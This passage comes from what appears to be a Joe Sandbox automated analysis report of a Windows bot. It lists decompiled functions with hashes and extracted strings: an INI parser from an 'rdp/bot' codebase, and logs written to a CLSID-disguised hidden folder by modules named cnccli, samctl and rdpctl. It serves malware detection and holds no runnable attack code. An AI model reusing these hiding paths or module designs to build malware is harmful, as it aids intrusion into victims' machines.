                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 58423ba29739921012416d05e5dbc1509c7eb61d3be863f7a2f3912cda20af73
                    • Instruction ID: ba875c8e43ea3cc856875f75497227ea4a52b77d27b5d8b1ba02779c9c239d61
                    • Opcode Fuzzy Hash: 58423ba29739921012416d05e5dbc1509c7eb61d3be863f7a2f3912cda20af73
                    • Instruction Fuzzy Hash: 1A21AB62A08BC396E6129F1CF8407AA3765BB857C8F454032EF8C47665DF3CE985E700
                    Function 00007FF8BFAB94F4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 591d9c77f18678ec0f49fccd3905a1aec4a9850be8c5e59c2f1693f793faafe9
                    • Instruction ID: 46f0709e31955beeb25d233a29e29e87e7fe66cbad7768e47212928abf92e3c6
                    • Opcode Fuzzy Hash: 591d9c77f18678ec0f49fccd3905a1aec4a9850be8c5e59c2f1693f793faafe9
                    • Instruction Fuzzy Hash: 56219161A08A4699E3159F99FC827AA3768BB487CCF445132EF4C47765DF3DD889C700
                    Function 00007FF8BA507AB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: b301655ed76bfcb65bf27385b654fd88f5a2592561199eef133ef872ace53a75
                    • Instruction ID: bf5530aeffd1650932a01a8f9068287ecfac999aba1bbe44d7e28cb4232bd1e1
                    • Opcode Fuzzy Hash: b301655ed76bfcb65bf27385b654fd88f5a2592561199eef133ef872ace53a75
                    • Instruction Fuzzy Hash: 6C214B2160CA43DAE6619F99EC807AA73A4FB467C8F444172EF4D47664DF3CEA89C700
                    Function 00007FF8B9189004 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 7feb5f99be34bff91d77dfd5db5aa2204c62c6314b7ac8121db4399c85ba9e29
                    • Instruction ID: fb7d2605498d6a04d36d5840b025d926639e05d7b175cbdbc1f31ad4bcf1e0b0
                    • Opcode Fuzzy Hash: 7feb5f99be34bff91d77dfd5db5aa2204c62c6314b7ac8121db4399c85ba9e29
                    • Instruction Fuzzy Hash: E6217A22A08A8696F6219F19F8807AA77A5BB447D4F444032EF4C47766DF3DD986F700
                    Function 00007FF8BFAB8FD0 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                    • API String ID: 1004003707-2568489879
                    • Opcode ID: 6b049bc3d6c029a052e072fb1fc95993046fbce77934b4af55192470ce624f2e
                    • Instruction ID: 556cf51f723767135a0144a592fd5934884a3d408bb6a427666a1e1da5c66b31
                    • Opcode Fuzzy Hash: 6b049bc3d6c029a052e072fb1fc95993046fbce77934b4af55192470ce624f2e
                    • Instruction Fuzzy Hash: 574159A1A0CA47A5FA699BD9AC833F46360AF483CCF446432DB5C06196DF7DEA59D300
                    Function 00007FF8BA507590 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                    • API String ID: 1004003707-2568489879
                    • Opcode ID: 1a184603a095c2785f17211911e662ef83ed393e3036cf695f0e3083be6901ce
                    • Instruction ID: 13747ca68a08390c090055bb459cc5ac39e020335aa1f91ad11b34e765d592de
                    • Opcode Fuzzy Hash: 1a184603a095c2785f17211911e662ef83ed393e3036cf695f0e3083be6901ce
                    • Instruction Fuzzy Hash: 9041EB61E0CA47D5FA609BDDAD803B52364BB063C8F8445B2DF4E465A5DF3CAB59C300
                    Function 00007FF8BFAB8E49 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                    • API String ID: 1004003707-3977765790
                    • Opcode ID: a5c6423a5378826f41d1e00e337d869f499e52ea9b23018924f27b0ddc25a9b7
                    • Instruction ID: 878e7b82a69d4d0e5f7cb492d43da888e2cb05970bbd5d840b266d956bcf38aa
                    • Opcode Fuzzy Hash: a5c6423a5378826f41d1e00e337d869f499e52ea9b23018924f27b0ddc25a9b7
                    • Instruction Fuzzy Hash: F44141A1A0CA47A5FA19ABDCEC427B46391AF483CCF446036DB0D06196DF7CE55AD310
                    Function 00007FF8BA507409 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                    • API String ID: 1004003707-3977765790
                    • Opcode ID: 3d6d22d10641deace307fba5547bc6261cfc25d0abbb71d060340f09f2567f54
                    • Instruction ID: f2acb7726a1c969784fc4d013b0b3a17edee90f3b3d15fd767fa98817a89d0f3
                    • Opcode Fuzzy Hash: 3d6d22d10641deace307fba5547bc6261cfc25d0abbb71d060340f09f2567f54
                    • Instruction Fuzzy Hash: 3741E861A0CA47E6FA208BD9AC817F52754BB123C8F4445B6DF4D469A5EF3CEB4AC300
                    Function 00007FF8B9188959 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                    • API String ID: 1004003707-3977765790
                    • Opcode ID: bbd8d863d0c2393a798718cc76c9459790273a858cadf82e92e436848f4ab38c
                    • Instruction ID: 7b27ca96c6272c38e14ce30cf6208caefe170f999f47ff984c3b7d6dc462309e
                    • Opcode Fuzzy Hash: bbd8d863d0c2393a798718cc76c9459790273a858cadf82e92e436848f4ab38c
                    • Instruction Fuzzy Hash: 8A411A62A185C7A5FA209F5CE8807F463A1AB003C8F598532DB6D465D7EF3CA946F300
                    Function 00007FF70887824D Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 76stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                    • API String ID: 39653677-1686225151
                    • Opcode ID: 1bacbc015b66ee95983f845907e4a34e664ad53536c5297d35e9b82757521785
                    • Instruction ID: 9a64d2e2800da9be375d7bf2ebe10c18edf8bcd5c8e6497d5028bd97cd5caaaa
                    • Opcode Fuzzy Hash: 1bacbc015b66ee95983f845907e4a34e664ad53536c5297d35e9b82757521785
                    • Instruction Fuzzy Hash: AF21DF12A2CF4345EB24FA259C0CB79D6A14F55B89F884070DA4E4B3D2DF2CE8A0836C
                    Function 00007FF8BFB52FD2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                    • API String ID: 513531256-2729875187
                    • Opcode ID: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                    • Instruction ID: 192698b790a3d7501eb2b4f62925a19198bc1222833894718abd5b71bfc7802f
                    • Opcode Fuzzy Hash: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                    • Instruction Fuzzy Hash: 64418F72A0C641A6F7209BDDE8643BAB761BB887C4F484031DB4D83795DF3CE5898740
                    Function 00007FF8BFB81292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                    • API String ID: 513531256-3034662401
                    • Opcode ID: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
                    • Instruction ID: 35fe09fd5ab75f8f0947a13e1b2c85f5956fca94ccb25f00d5fd60c10542b033
                    • Opcode Fuzzy Hash: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
                    • Instruction Fuzzy Hash: E0416F21A0D68286F3219B99E8553FA73A1FB897C0F448035DB4D97B96CF3CE985C740
                    Function 00007FF8B9151292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                    • API String ID: 513531256-2115573132
                    • Opcode ID: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                    • Instruction ID: e53a5fb9558cbbbc1d3acd7d4ae9cdab037c85f043cb7140463db60464642fe5
                    • Opcode Fuzzy Hash: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                    • Instruction Fuzzy Hash: 03417E75E0D6C286F322AF19E8643B96361AB897C0F444031DB4D87B95CF7CE586E740
                    Function 00007FF8BFABA202 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                    • API String ID: 513531256-1680544107
                    • Opcode ID: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
                    • Instruction ID: 5dbfc850651ab64853deb5ed9a89276e18f70564916043b9ca9f0c6ba60b0c8a
                    • Opcode Fuzzy Hash: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
                    • Instruction Fuzzy Hash: E541B331A0CA859AF3289B98EC963BAA354FB857C8F442031DB4D47792CF3DE5898740
                    Function 00007FF8BA501292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                    • API String ID: 513531256-2601447032
                    • Opcode ID: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                    • Instruction ID: e4a6ee1a23003230ed0d0669cea95054b0dd28d5e343d22f2643540756e14ce5
                    • Opcode Fuzzy Hash: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                    • Instruction Fuzzy Hash: 00414D71A4C68186F720DB9AEC543BA6361BB8A7C4F4400B6DF4D877A5CF2DEB858700
                    Function 00007FF8B9181292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log
                    • API String ID: 513531256-1022500615
                    • Opcode ID: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                    • Instruction ID: 15cc3d0b5a60226fdfc4e58b4d97cdd2c4676b62474891348f41eafe1da1afa4
                    • Opcode Fuzzy Hash: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                    • Instruction Fuzzy Hash: F4418B62A0C6C186F3209F19E8503F963A4FB9A7D0F854130DB0D57B96DF3DE986A704
                    Function 00007FF8BFB8C780 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: _errno
